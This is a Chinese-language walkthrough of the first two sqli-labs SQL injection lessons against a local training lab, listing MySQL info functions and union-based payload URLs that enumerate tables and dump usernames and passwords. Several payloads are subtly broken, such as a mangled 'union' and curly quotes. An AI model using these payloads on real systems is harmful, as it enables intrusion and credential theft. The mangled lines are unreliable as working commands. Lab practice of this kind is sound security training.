注意:有的代码可能存在中文标点导致命令执行不成功,多注意一下。
数据库名:database()
数据库版本: version()
数据库用户: user()
操作系统: @@version_compile_os
系统用户名: system_user()
当前用户名: current_user
连接数据库的用户名:session_user()
读取数据库路径:@@datadir
MYSQL安装路径:@@basedir
储存所有表名信息的表 : information_schema.tables
表名 : table_name
数据库名: table_schema
列名 : column_name
储存所有列名信息的表 : information_schema.columns
第一关
第一关是联合查询注入
判断注入点----判断是数字型还是字符型----查询列数----查询显示位----获取数据库名----获取数据库中的表名----获取列名----获取列中的数据 其实不管是联合查询还是盲注之类的基本都这样,大同小异。
http://localhost/sqli-labs-master/Less-1/?id=1’ – -
http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=1-- -
http://localhost/sqli-labs-master/Less-1/?id=1’ and 1=2-- -
http://localhost/sqli-labs-master/Less-1/?id=1’ order by 3-- -
http://localhost/sqli-labs-master/Less-1/?id=1’ order by 4-- -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,2,3-- -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,database(),user()-- -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=“security”),3 – -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”),3 – -
http://localhost/sqli-labs-master/Less-1/?id=-1’ union select 1,(select group_concat(concat_ws(id,username,password)) from users),3-- -
第二关
第二关也是联合查询注入跟上关一样,只是闭合方式不同。
二、
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=1
http://localhost/sqli-labs-master/Less-2/?id=1 and 1=2
http://localhost/sqli-labs-master/Less-2/?id=1 order by 3
http://localhost/sqli-labs-master/Less-2/?id=1 order by 4
http://localhost/sqli-labs-master/Less-2/?id=1 union select 1,2,3
http://localhost/sqli-labs-master/Less-2/?id=-1nion select 1,database(),user()
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(table_name)from information_schema.tables where table_schema=“security”),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=“security” and table_name=“users”),3
http://localhost/sqli-labs-master/Less-2/?id=-1 union select 1,(select group_concat(concat_ws(id,username,password)) from users),3